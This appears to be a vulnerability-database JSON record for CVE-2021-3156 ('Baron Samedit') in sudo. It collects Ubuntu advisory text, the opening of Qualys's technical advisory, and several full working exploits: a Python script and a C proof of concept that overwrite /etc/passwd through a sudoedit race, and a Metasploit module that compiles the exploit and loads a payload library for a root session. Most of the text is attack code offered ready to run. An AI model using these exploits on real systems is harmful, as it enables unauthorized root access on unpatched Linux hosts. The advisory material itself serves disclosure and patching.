execve failed\\n')\r\n sys.stdout.flush()\r\n os.abort()\r\n break\r\n\r\n if self.size != self.getSize(self.target):\r\n sys.stdout.write('[*] success at iteration %d \\n' % i)\r\n sys.stdout.flush()\r\n break\r\n sys.stdout.write(\"\"\"\r\n \\nConsider the following if the exploit fails:\r\n \\n\\t(1) If all directories are owned by root then sleep\r\nneeds to be decreased.\r\n \\n\\t(2) If they're all owned by you, then sleep needs\r\nincreased.\r\n \"\"\")\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(\r\n add_help=True,\r\n description='* Sudo Privilege Escalation / Heap Overflow -\r\nCVE-2021-3156 *'\r\n )\r\n try:\r\n parser.add_argument('-source', action='store', help='Path to\r\nmalicious \"passwd\" file to overwrite the target')\r\n parser.add_argument('-target', action='store', help='Target\r\nfile path to be overwritten (default: /etc/passwd)')\r\n parser.add_argument('-sleep', action='store', help='Sleep\r\nsetting for forked processes (default: 0.01 seconds')\r\n parser.set_defaults(target='/etc/passwd', sleep='0.01')\r\n\r\n options = parser.parse_args()\r\n if options.source is None:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n exp = Exploit(\r\n source=options.source,\r\n target=options.target,\r\n sleep=float(options.sleep)\r\n )\r\n exp.main()\r\n except Exception as err:\r\n sys.stderr.write(str(err))", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49521"}], "ubuntu": [{"lastseen": "2021-02-04T15:51:50", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "USN-4705-1 fixed a vulnerability in Sudo. This update provides \nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that Sudo incorrectly handled memory when parsing command \nlines. A local attacker could possibly use this issue to obtain unintended \naccess to the administrator account. 
(CVE-2021-3156)", "edition": 2, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "USN-4705-2", "href": "https://ubuntu.com/security/notices/USN-4705-2", "title": "Sudo vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T16:06:52", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23239", "CVE-2021-3156"], "description": "It was discovered that Sudo incorrectly handled memory when parsing command \nlines. A local attacker could possibly use this issue to obtain unintended \naccess to the administrator account. (CVE-2021-3156)\n\nIt was discovered that the Sudo sudoedit utility incorrectly handled \nchecking directory permissions. A local attacker could possibly use this \nissue to bypass file permissions and determine if a directory exists or \nnot. (CVE-2021-23239)", "edition": 2, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "USN-4705-1", "href": "https://ubuntu.com/security/notices/USN-4705-1", "title": "Sudo vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-02-03T17:16:54", "description": "", "published": "2021-02-03T00:00:00", "type": "packetstorm", "title": "Sudo 1.9.5p1 Buffer Overflow / Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-03T00:00:00", "id": "PACKETSTORM:161270", "href": "https://packetstormsecurity.com/files/161270/Sudo-1.9.5p1-Buffer-Overflow-Privilege-Escalation.html", "sourceData": "`# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1) \n# Date: 2021-02-02 \n# Exploit Author: West Shepherd \n# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1. 
\n# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31 \n# CVE : CVE-2021-3156 \n# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code. \n# Sources: \n# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit \n# (2) https://github.com/stong/CVE-2021-3156 \n# Requirements: Python3 \n \n#!/usr/bin/python3 \nimport os \nimport pwd \nimport time \nimport sys \nimport argparse \n \n \nclass Exploit(object): \nusername = '' \nsize = 0 \ndata = '' \n \ndef __init__(self, source, target, sleep): \nself.sleep = sleep \nself.source = source \nself.target = target \n \n@staticmethod \ndef readFile(path): \nreturn open(path, 'r').read() \n \n@staticmethod \ndef getUser(): \nreturn pwd.getpwuid(os.getuid())[0] \n \n@staticmethod \ndef getSize(path): \nreturn os.stat(path).st_size \n \ndef main(self): \nself.username = self.getUser() \nself.data = self.readFile(self.source) \nself.size = self.getSize(self.target) \nenviron = { \n'\\n\\n\\n\\n\\n': '\\n' + self.data, \n'SUDO_ASKPASS': '/bin/false', \n'LANG': \n'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', \n'A': 'A' * 0xffff \n} \nfor i in range(5000): \ndirectory = \n'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i \noverflow = \n'11111111111111111111111111111111111111111111111111111111%s' % \ndirectory \n \nif os.path.exists(directory): \nsys.stdout.write('file exists %s\\n' % directory) \ncontinue \n \nchild = os.fork() \nos.environ = environ \nif child: \nsys.stdout.write('[+] parent %d \\n' % i) \nsys.stdout.flush() \ntime.sleep(self.sleep) \nif not os.path.exists(directory): \ntry: \nos.mkdir(directory, 0o700) \nos.symlink(self.target, '%s/%s' % (directory, \nself.username)) \nos.waitpid(child, 0) \nexcept: \ncontinue \nelse: \nsys.stdout.write('[+] child %d \\n' % i) \nsys.stdout.flush() \nos.setpriority(os.PRIO_PROCESS, 0, 20) \nos.execve( 
\npath='/usr/bin/sudoedit', \nargv=[ \n'/usr/bin/sudoedit', \n'-A', \n'-s', \n'\\\\', \noverflow \n], \nenv=environ \n) \nsys.stdout.write('[!] execve failed\\n') \nsys.stdout.flush() \nos.abort() \nbreak \n \nif self.size != self.getSize(self.target): \nsys.stdout.write('[*] success at iteration %d \\n' % i) \nsys.stdout.flush() \nbreak \nsys.stdout.write(\"\"\" \n\\nConsider the following if the exploit fails: \n\\n\\t(1) If all directories are owned by root then sleep \nneeds to be decreased. \n\\n\\t(2) If they're all owned by you, then sleep needs \nincreased. \n\"\"\") \n \n \nif __name__ == '__main__': \nparser = argparse.ArgumentParser( \nadd_help=True, \ndescription='* Sudo Privilege Escalation / Heap Overflow - \nCVE-2021-3156 *' \n) \ntry: \nparser.add_argument('-source', action='store', help='Path to \nmalicious \"passwd\" file to overwrite the target') \nparser.add_argument('-target', action='store', help='Target \nfile path to be overwritten (default: /etc/passwd)') \nparser.add_argument('-sleep', action='store', help='Sleep \nsetting for forked processes (default: 0.01 seconds') \nparser.set_defaults(target='/etc/passwd', sleep='0.01') \n \noptions = parser.parse_args() \nif options.source is None: \nparser.print_help() \nsys.exit(1) \n \nexp = Exploit( \nsource=options.source, \ntarget=options.target, \nsleep=float(options.sleep) \n) \nexp.main() \nexcept Exception as err: \nsys.stderr.write(str(err)) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161270/sudo195p1-overflowescalate.txt"}, {"lastseen": "2021-02-01T16:48:34", "description": "", "published": "2021-02-01T00:00:00", "type": "packetstorm", "title": "Sudo Buffer Overflow / Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-01T00:00:00", "id": "PACKETSTORM:161230", "href": "https://packetstormsecurity.com/files/161230/Sudo-Buffer-Overflow-Privilege-Escalation.html", 
"sourceData": "`# Exploit Title: Local Privilege Escalation - LPE \n# Authors and Contributors: cts, help from r4j, debug by nu11secur1ty \n# Date: 30.01.2021 \n# Vendor: https://www.sudo.ws/ \n# Link: https://www.sudo.ws/download.html \n# CVE: CVE-2021-3156 \n \n \n[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) \n[+] Website: https://www.nu11secur1ty.com/ \n[+] Source: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021 \n \n \n[Exploit Program Code] \n \n// Exploit by @gf_256 aka cts \n// With help from r4j \n// Debug by @nu11secur1ty \n// Original advisory by Baron Samedit of Qualys \n \n// Tested on Ubuntu 18.04 and 20.04 & 20.04.01 \n// You will probably need to adjust RACE_SLEEP_TIME. \n \n#include <stdio.h> \n#include <stdint.h> \n#include <stdlib.h> \n#include <string.h> \n#include <stdlib.h> \n#include <assert.h> \n#include <unistd.h> \n#include <sys/wait.h> \n#include <sys/types.h> \n#include <sys/resource.h> \n#include <sys/stat.h> \n#include <unistd.h> \n#include <fcntl.h> \n#include <pwd.h> \n \n// !!! best value of this varies from system-to-system !!! \n// !!! you will probably need to tune this !!! \n#define RACE_SLEEP_TIME 10000 \n \nchar *target_file; \nchar *src_file; \n \nsize_t query_target_size() \n{ \nstruct stat st; \nstat(target_file, &st); \nreturn st.st_size; \n} \n \nchar* read_src_contents() \n{ \nFILE* f = fopen(src_file, \"rb\"); \nif (!f) { \nputs(\"oh no baby what are you doing :(\"); \nabort(); \n} \nfseek(f, 0, SEEK_END); \nlong fsize = ftell(f); \nfseek(f, 0, SEEK_SET); \nchar *content = malloc(fsize + 1); \nfread(content, 1, fsize, f); \nfclose(f); \nreturn content; \n} \n \nchar* get_my_username() \n{ \n// getlogin can return incorrect result (for example, root under su)! 
\nstruct passwd *pws = getpwuid(getuid()); \nreturn strdup(pws->pw_name); \n} \n \nint main(int my_argc, char **my_argv) \n{ \nputs(\"CVE-2021-3156 PoC by @gf_256\"); \nputs(\"original advisory by Baron Samedit\"); \n \nif (my_argc != 3) { \nputs(\"./meme <target file> <src file>\"); \nputs(\"Example: ./meme /etc/passwd my_fake_passwd_file\"); \nreturn 1; \n} \ntarget_file = my_argv[1]; \nsrc_file = my_argv[2]; \nprintf(\"we will overwrite %s with shit from %s\\n\", target_file, \nsrc_file); \n \nchar* myusername = get_my_username(); \nprintf(\"hi, my name is %s\\n\", myusername); \n \nsize_t initial_size = query_target_size(); \nprintf(\"%s is %zi big right now\\n\", target_file, initial_size); \n \nchar* shit_to_write = read_src_contents(); \n \nchar memedir[1000]; \nchar my_symlink[1000]; \nchar overflow[1000]; \n \nchar* bigshit = calloc(1,0x10000); \nmemset(bigshit, 'A', 0xffff); // need a big shit in the stack so the \nwrite doesn't fail with bad address \n \nchar *argv[] = {\"/usr/bin/sudoedit\", \"-A\", \"-s\", \"\\\\\", \noverflow, \nNULL \n}; \n \nchar *envp[] = { \n\"\\n\\n\\n\\n\\n\", // put some fuckin newlines here to separate our real \ncontents from the junk \nshit_to_write, \n\"SUDO_ASKPASS=/bin/false\", \n \n\"LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n\", \nbigshit, \nNULL \n}; \n \nputs(\"ok podracing time bitches\"); \n \n// Boom =) \n// for (int i = 0; i < 5000; i++) \nfor (int i = 0; i < 3000; i++) { \nsprintf(memedir, \n\"ayylmaobigchungussssssssssss00000000000000000000000000%08d\", i); \nsprintf(overflow, \n\"11111111111111111111111111111111111111111111111111111111%s\", memedir); \nsprintf(my_symlink, \"%s/%s\", memedir, myusername); \nputs(memedir); \n \nif (access(memedir, F_OK) == 0) { \nprintf(\"dude, %s already exists, do it from a clean working \ndir\\n\", memedir); \nreturn 1; \n} \n \npid_t childpid = fork(); \nif (childpid) { // parent \nusleep(RACE_SLEEP_TIME); \nmkdir(memedir, 0700); 
\nsymlink(target_file, my_symlink); \nwaitpid(childpid, 0, 0); \n} else { // child \nsetpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race \nreliability \nexecve(\"/usr/bin/sudoedit\", argv, envp); // noreturn \nputs(\"execve fails?!\"); \nabort(); \n} \n \nif (query_target_size() != initial_size) { \nputs(\"target file has a BRUH MOMENT!!!! SUCCess???\"); \nsystem(\"xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'\"); \n// ayy lmao \nreturn 0; \n} \n} \n \nputs(\"Failed?\"); \nputs(\"if all the meme dirs are owned by root, the usleep needs to be \ndecreased.\"); \nputs(\"if they're all owned by you, the usleep needs to be increased\"); \n \n \nreturn 0; \n} \n \n[Vendor] \nSudo \n \n \n[Vulnerability Type] \nBuffer Overflow Local Privilege Escalation \n \n[CVE Reference] \nSudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege \nescalation to root via \"sudoedit -s\" \nand a command-line argument that ends with a single backslash character. \n \n[Security Issue] \nTaking control of the Linux system \nVulnerabilty version: before 1.9.5p2 \n \n \n[Video] \nhttps://www.youtube.com/watch?v=L-dEIYEQd1E \n \n \n[Conclusion and Fix] \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156 \nhttps://www.youtube.com/watch?v=zf8FXOFWZKs \n \n \n@nu11secur1ty \nhttps://www.nu11secur1ty.com/ \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161230/sudo-escalate.txt"}, {"lastseen": "2021-02-05T16:54:08", "description": "", "published": "2021-02-05T00:00:00", "type": "packetstorm", "title": "Sudo 1.8.31p2 / 1.9.5p1 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-05T00:00:00", "id": "PACKETSTORM:161293", "href": "https://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: 
https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Post::File \ninclude Msf::Post::Unix \ninclude Msf::Post::Linux::Compile \ninclude Msf::Post::Linux::System \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Sudo Heap-Based Buffer Overflow', \n'Description' => %q( \nA heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker \nto gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2 \nthrough 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this \nimplementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker \ncontrolled library which results in it being loaded with the elevated privileges held by sudo. 
\n), \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # vulnerability discovery and analysis \n'Spencer McIntyre', # metasploit module \n'bwatters-r7', # metasploit module \n'blasty <blasty@fail0verflow.com>', # original PoC \n'Alexander Krog' # detailed vulnerability analysis and exploit technique \n], \n'SessionTypes' => ['shell', 'meterpreter'], \n'Platform' => ['unix', 'linux'], \n'References' => [ \n['URL', 'https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit'], \n['URL', 'https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt'], \n['URL', 'https://www.kalmarunionen.dk/writeups/sudo/'], \n['URL', 'https://github.com/blasty/CVE-2021-3156/blob/main/hax.c'], \n['CVE', '2021-3156'], \n], \n'Targets' => \n[ \n[ 'Manual', { } ], \n[ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ] } ], \n[ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { lengths: [ 56, 54, 63, 212 ] } ], \n], \n'DefaultTarget' => 1, \n'Arch' => ARCH_X64, \n'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true, 'WfsDelay' => 10 }, \n'DisclosureDate' => '2021-01-26', \n'Notes' => { \n'AKA' => [ 'Baron Samedit' ], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]) \n]) \n \nregister_advanced_options([ \nOptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. 
(format: #,#,#,#)' ], regex: /(\\d+(,[ ]*| )){3}\\d+/) \n]) \n \nderegister_options('COMPILE') \nend \n \ndef get_versions \nversions = {} \noutput = cmd_exec(\"sudo --version\") \nif output \nversion = output.split(\"\\n\").first.split(' ').last \nversions[:sudo] = version if version =~ /^\\d/ \nend \n \nversions \nend \n \ndef check \nsudo_version = get_versions[:sudo] \nreturn CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil? \n \n# fixup the p number used by sudo to be compatible with Gem::Version \nsudo_version.gsub!(/p/, '.') \n \nvuln_builds = [ \n[Gem::Version.new('1.8.2'), Gem::Version.new('1.8.31.2')], \n[Gem::Version.new('1.9.0'), Gem::Version.new('1.9.5.1')], \n] \n \nif sudo_version == '1.8.31' \n# Ubuntu patched it as version 1.8.31-1ubuntu1.2 which is reported as 1.8.31 \nreturn CheckCode::Detected(\"sudo #{sudo_version} maybe a vulnerable build.\") \nend \n \nif vuln_builds.any? { |build_range| Gem::Version.new(sudo_version).between?(*build_range) } \nreturn CheckCode::Appears(\"sudo #{sudo_version} is a vulnerable build.\") \nend \n \nCheckCode::Safe(\"sudo #{sudo_version} is not a vulnerable build.\") \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nwrite_file path, data \nend \n \ndef exploit \nif target.name == 'Manual' \nfail_with(Failure::BadConfig, 'The \"Lengths\" advanced option must be specified for the manual target') if datastore['Lengths'].blank? \narguments = datastore['Lengths'].gsub(/,/, ' ').gsub(/ +/, ' ') \nelse \narguments = target[:lengths].join(' ') \nend \n \nfail_with(Failure::NotFound, 'The gcc binary was not found') unless has_gcc? 
\n \npath = datastore['WritableDir'] \ncmd_exec(\"mkdir -p #{path}/libnss_X\") \n \nfile_name = rand_text_alphanumeric(5..10) \nupload_and_compile(\"#{path}/#{file_name}\", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil') \nupload(\"#{path}/libnss_X/P0P_SH3LLZ_ .so.2\", generate_payload_dll) \ncmd_exec(\"#{path}/#{file_name} #{arguments}\") \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161293/sudo_baron_samedit.rb.txt"}, {"lastseen": "2021-01-27T14:32:41", "description": "", "published": "2021-01-27T00:00:00", "type": "packetstorm", "title": "Sudo Heap-Based Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "id": "PACKETSTORM:161160", "href": "https://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html", "sourceData": "` \nQualys Security Advisory \n \nBaron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156) \n \n \n======================================================================== \nContents \n======================================================================== \n \nSummary \nAnalysis \nExploitation \nAcknowledgments \nTimeline \n \n \n======================================================================== \nSummary \n======================================================================== \n \nWe discovered a heap-based buffer overflow in Sudo \n(https://www.sudo.ws/). This vulnerability: \n \n- is exploitable by any local user (normal users and system users, \nsudoers and non-sudoers), without authentication (i.e., the attacker \ndoes not need to know the user's password); \n \n- was introduced in July 2011 (commit 8255ed69), and affects all legacy \nversions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to \n1.9.5p1, in their default configuration. 
\n \nWe developed three different exploits for this vulnerability, and \nobtained full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 \n(Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Other operating systems and \ndistributions are probably also exploitable. \n \n \n======================================================================== \nAnalysis \n======================================================================== \n \nIf Sudo is executed to run a command in \"shell\" mode (shell -c command): \n \n- either through the -s option, which sets Sudo's MODE_SHELL flag; \n \n- or through the -i option, which sets Sudo's MODE_SHELL and \nMODE_LOGIN_SHELL flags; \n \nthen, at the beginning of Sudo's main(), parse_args() rewrites argv \n(lines 609-617), by concatenating all command-line arguments (lines \n587-595) and by escaping all meta-characters with backslashes (lines \n590-591): \n \n------------------------------------------------------------------------ \n571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) { \n572 char **av, *cmnd = NULL; \n573 int ac = 1; \n... \n581 cmnd = dst = reallocarray(NULL, cmnd_size, 2); \n... \n587 for (av = argv; *av != NULL; av++) { \n588 for (src = *av; *src != '\\0'; src++) { \n589 /* quote potential meta characters */ \n590 if (!isalnum((unsigned char)*src) && *src != '_' && *src != '-' && *src != '$') \n591 *dst++ = '\\\\'; \n592 *dst++ = *src; \n593 } \n594 *dst++ = ' '; \n595 } \n... \n600 ac += 2; /* -c cmnd */ \n... \n603 av = reallocarray(NULL, ac + 1, sizeof(char *)); \n... 
\n609 av[0] = (char *)user_details.shell; /* plugin may override shell */ \n610 if (cmnd != NULL) { \n611 av[1] = \"-c\"; \n612 av[2] = cmnd; \n613 } \n614 av[ac] = NULL; \n615 \n616 argv = av; \n617 argc = ac; \n618 } \n------------------------------------------------------------------------ \n \nLater, in sudoers_policy_main(), set_cmnd() concatenates the \ncommand-line arguments into a heap-based buffer \"user_args\" (lines \n864-871) and unescapes the meta-characters (lines 866-867), \"for sudoers \nmatching and logging purposes\": \n \n------------------------------------------------------------------------ \n819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { \n... \n852 for (size = 0, av = NewArgv + 1; *av; av++) \n853 size += strlen(*av) + 1; \n854 if (size == 0 || (user_args = malloc(size)) == NULL) { \n... \n857 } \n858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { \n... \n864 for (to = user_args, av = NewArgv + 1; (from = *av); av++) { \n865 while (*from) { \n866 if (from[0] == '\\\\' && !isspace((unsigned char)from[1])) \n867 from++; \n868 *to++ = *from++; \n869 } \n870 *to++ = ' '; \n871 } \n... \n884 } \n... \n886 } \n------------------------------------------------------------------------ \n \nUnfortunately, if a command-line argument ends with a single backslash \ncharacter, then: \n \n- at line 866, \"from[0]\" is the backslash character, and \"from[1]\" is \nthe argument's null terminator (i.e., not a space character); \n \n- at line 867, \"from\" is incremented and points to the null terminator; \n \n- at line 868, the null terminator is copied to the \"user_args\" buffer, \nand \"from\" is incremented again and points to the first character \nafter the null terminator (i.e., out of the argument's bounds); \n \n- the \"while\" loop at lines 865-869 reads and copies out-of-bounds \ncharacters to the \"user_args\" buffer. 
\n \nIn other words, set_cmnd() is vulnerable to a heap-based buffer \noverflow, because the out-of-bounds characters that are copied to the \n\"user_args\" buffer were not included in its size (calculated at lines \n852-853). \n \nIn theory, however, no command-line argument can end with a single \nbackslash character: if MODE_SHELL or MODE_LOGIN_SHELL is set (line 858, \na necessary condition for reaching the vulnerable code), then MODE_SHELL \nis set (line 571) and parse_args() already escaped all meta-characters, \nincluding backslashes (i.e., it escaped every single backslash with a \nsecond backslash). \n \nIn practice, however, the vulnerable code in set_cmnd() and the escape \ncode in parse_args() are surrounded by slightly different conditions: \n \n------------------------------------------------------------------------ \n819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { \n... \n858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { \n------------------------------------------------------------------------ \n \nversus: \n \n------------------------------------------------------------------------ \n571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) { \n------------------------------------------------------------------------ \n \nOur question, then, is: can we set MODE_SHELL and either MODE_EDIT or \nMODE_CHECK (to reach the vulnerable code) but not the default MODE_RUN \n(to avoid the escape code)? \n \nThe answer, it seems, is no: if we set MODE_EDIT (-e option, line 361) \nor MODE_CHECK (-l option, lines 423 and 519), then parse_args() removes \nMODE_SHELL from the \"valid_flags\" (lines 363 and 424) and exits with an \nerror if we specify an invalid flag such as MODE_SHELL (lines 532-533): \n \n------------------------------------------------------------------------ \n358 case 'e': \n... \n361 mode = MODE_EDIT; \n362 sudo_settings[ARG_SUDOEDIT].value = \"true\"; \n363 valid_flags = MODE_NONINTERACTIVE; \n364 break; \n... 
\n416 case 'l': \n... \n423 mode = MODE_LIST; \n424 valid_flags = MODE_NONINTERACTIVE|MODE_LONG_LIST; \n425 break; \n... \n518 if (argc > 0 && mode == MODE_LIST) \n519 mode = MODE_CHECK; \n... \n532 if ((flags & valid_flags) != flags) \n533 usage(1); \n------------------------------------------------------------------------ \n \nBut we found a loophole: if we execute Sudo as \"sudoedit\" instead of \n\"sudo\", then parse_args() automatically sets MODE_EDIT (line 270) but \ndoes not reset \"valid_flags\", and the \"valid_flags\" include MODE_SHELL \nby default (lines 127 and 249): \n \n------------------------------------------------------------------------ \n127 #define DEFAULT_VALID_FLAGS (MODE_BACKGROUND|MODE_PRESERVE_ENV|MODE_RESET_HOME|MODE_LOGIN_SHELL|MODE_NONINTERACTIVE|MODE_SHELL) \n... \n249 int valid_flags = DEFAULT_VALID_FLAGS; \n... \n267 proglen = strlen(progname); \n268 if (proglen > 4 && strcmp(progname + proglen - 4, \"edit\") == 0) { \n269 progname = \"sudoedit\"; \n270 mode = MODE_EDIT; \n271 sudo_settings[ARG_SUDOEDIT].value = \"true\"; \n272 } \n------------------------------------------------------------------------ \n \nConsequently, if we execute \"sudoedit -s\", then we set both MODE_EDIT \nand MODE_SHELL (but not MODE_RUN), we avoid the escape code, reach the \nvulnerable code, and overflow the heap-based buffer \"user_args\" through \na command-line argument that ends with a single backslash character: \n \n------------------------------------------------------------------------ \nsudoedit -s '\\' `perl -e 'print \"A\" x 65536'` \nmalloc(): corrupted top size \nAborted (core dumped) \n------------------------------------------------------------------------ \n \nFrom an attacker's point of view, this buffer overflow is ideal: \n \n- we control the size of the \"user_args\" buffer that we overflow (the \nsize of our concatenated command-line arguments, at lines 852-854); \n \n- we independently control the size and contents of the overflow 
itself \n(our last command-line argument is conveniently followed by our first \nenvironment variables, which are not included in the size calculation \nat lines 852-853); \n \n- we can even write null bytes to the buffer that we overflow (every \ncommand-line argument or environment variable that ends with a single \nbackslash writes a null byte to \"user_args\", at lines 866-868). \n \nFor example, on an amd64 Linux, the following command allocates a \n24-byte \"user_args\" buffer (a 32-byte heap chunk) and overwrites the \nnext chunk's size field with \"A=a\\0B=b\\0\" (0x00623d4200613d41), its fd \nfield with \"C=c\\0D=d\\0\" (0x00643d4400633d43), and its bk field with \n\"E=e\\0F=f\\0\" (0x00663d4600653d45): \n \n------------------------------------------------------------------------ \nenv -i 'AA=a\\' 'B=b\\' 'C=c\\' 'D=d\\' 'E=e\\' 'F=f' sudoedit -s '1234567890123456789012\\' \n------------------------------------------------------------------------ \n \n--|--------+--------+--------+--------|--------+--------+--------+--------+-- \n| | |12345678|90123456|789012.A|A=a.B=b.|C=c.D=d.|E=e.F=f.| \n--|--------+--------+--------+--------|--------+--------+--------+--------+-- \nsize <---- user_args buffer ----> size fd bk \n \n \n======================================================================== \nExploitation \n======================================================================== \n \nBecause Sudo calls localization functions at the very beginning of its \nmain() function: \n \n------------------------------------------------------------------------ \n154 setlocale(LC_ALL, \"\"); \n155 bindtextdomain(PACKAGE_NAME, LOCALEDIR); \n156 textdomain(PACKAGE_NAME); \n------------------------------------------------------------------------ \n \nand passes translation strings (through the gettext() function and _() \nmacro) to format-string functions such as: \n \n------------------------------------------------------------------------ \n301 
sudo_printf(SUDO_CONV_ERROR_MSG, _(\"%s is not in the sudoers \" \n302 \"file. This incident will be reported.\\n\"), user_name); \n------------------------------------------------------------------------ \n \nwe initially wanted to reuse halfdog's fascinating technique from \nhttps://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ and \ntransform Sudo's heap-based buffer overflow into a format-string \nexploit. More precisely: \n \n- at line 154, in setlocale(), we malloc()ate and free() several LC \nenvironment variables (LC_CTYPE, LC_MESSAGES, LC_TIME, etc), thereby \ncreating small holes at the very beginning of Sudo's heap (free fast \nor tcache chunks); \n \n- at line 155, bindtextdomain() malloc()ates a struct binding, which \ncontains a dirname pointer to the name of a directory that contains \n\".mo\" catalog files and hence translation strings; \n \n- in set_cmnd(), we malloc()ate the \"user_args\" buffer into one of the \nholes at the beginning of Sudo's heap, and overflow this buffer, thus \noverwriting the struct binding's dirname pointer; \n \n- at line 301 (for example), gettext() (through the _() macro) loads our \nown translation string from the overwritten dirname -- in other words, \nwe control the format string that is passed to sudo_printf(). \n \nTo implement this initial technique, we wrote a rudimentary brute-forcer \nthat executes Sudo inside gdb, overflows the \"user_args\" buffer, and \nrandomly selects the following parameters: \n \n- the LC environment variables that we pass to Sudo, and their length \n(we use the \"C.UTF-8\" locale and append a random \"@modifier\"); \n \n- the size of the \"user_args\" buffer that we overflow; \n \n- the size of the overflow itself; \n \n- whether we go through Sudo's authentication code (-A or -n option) or \nnot (-u #realuid option). 
